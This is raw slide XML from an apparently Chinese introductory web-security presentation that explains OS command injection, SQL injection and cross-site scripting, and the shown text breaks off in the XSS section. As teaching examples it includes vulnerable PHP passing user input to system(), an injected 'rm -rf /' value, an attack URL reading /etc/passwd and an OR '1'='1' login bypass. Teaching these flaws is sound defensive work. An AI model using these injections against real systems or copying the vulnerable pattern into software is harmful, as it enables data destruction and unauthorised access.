      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14338" name="Picture 2" descr="http://photocdn.sohu.com/20160122/mp55920267_1453420419714_2.jpe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87674" y="103806"/>
            <a:ext cx="4086225" cy="19281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469117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422808"/>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2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="976390"/>
            <a:ext cx="8650738" cy="5881610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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【1】WEB</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安全</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pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>黑客利用网站操作系统的漏洞和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务程序的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的控制权限，轻则篡改网页内容，重则窃取重要内部数据，更为严重的则是在网页中植入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>恶意代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，使得网站访问者受到侵害。</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lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码注入：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令是指为了通过网络接口在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令的一种技术。如果应用程序使用外部输入的字符串或者受到外部影响的字符串组合命令，并且没有经过正确的过滤，就有可能导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令注入攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$username = $_POST["user"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$command = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -l /home/'.$username;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system($command);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如果 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>变量没有做过滤，传入的是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>那</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>么 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的结果为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –l /home/; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.site.com/test.php?&amp;username=%27ls%20%E2%80%93l%27%20cat%20/etc/passwd/etc/passwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15362" name="Picture 2" descr="http://g.hiphotos.baidu.com/zhidao/wh%3D450%2C600/sign=fe7b1e7e740e0cf3a0a246ff3f76de29/f636afc379310a55dd306d98b14543a982261041.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835898" y="4111625"/>
            <a:ext cx="2578102" cy="18557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2599175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422808"/>
            <a:ext cx="3744936" cy="572464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"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sz="2400"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2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="889344"/>
            <a:ext cx="8494644" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击，是发生在应用程序和数据库之间的安全漏洞。简而言之，就是在输入的字符串之中注入了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令，在设计不当的过程中忽略了检查，那么这些注入指令就会被数据库服务器误认为是正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令而执行，因此造成数据泄露。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>例如：网站登录用户 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin 123456</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>正</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>确的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT id FROM users WHERE username=‘admin’ AND password=‘123456’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>击的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT id FROM users WHERE username=‘ ’ OR ‘1’ = ‘1’ AND password= ‘ ’ OR ‘1’ = ‘1’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>其实就等于这条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT id FROM users;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25606" name="Picture 6" descr="http://image.lxway.com/thumb/280x220/d/9a/d9acff3c31485a12cfe4a34d4421a53d.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4292" y="4344832"/>
            <a:ext cx="2667000" cy="2095501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25608" name="Picture 8" descr="http://i-4.shouji56.com/2016/9/28/d26a0b29-73f9-4497-8cf3-8277c1bb3be3.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771292" y="4344831"/>
            <a:ext cx="2588214" cy="209550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图片 10"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864861" y="4344832"/>
            <a:ext cx="3239430" cy="2095501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="303304893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471986"/>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2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1085021"/>
            <a:ext cx="8494644" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>站脚本攻击是一种网站应用程序的安全漏洞攻击，是脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>码注入的一种，它允许恶意用户将恶意的脚本代码注入到网页上，其他用户在观看网页时，脚本就会执行。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Twitter Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Yahoo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>微博 都受到这种攻击影响。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>害：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>修</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
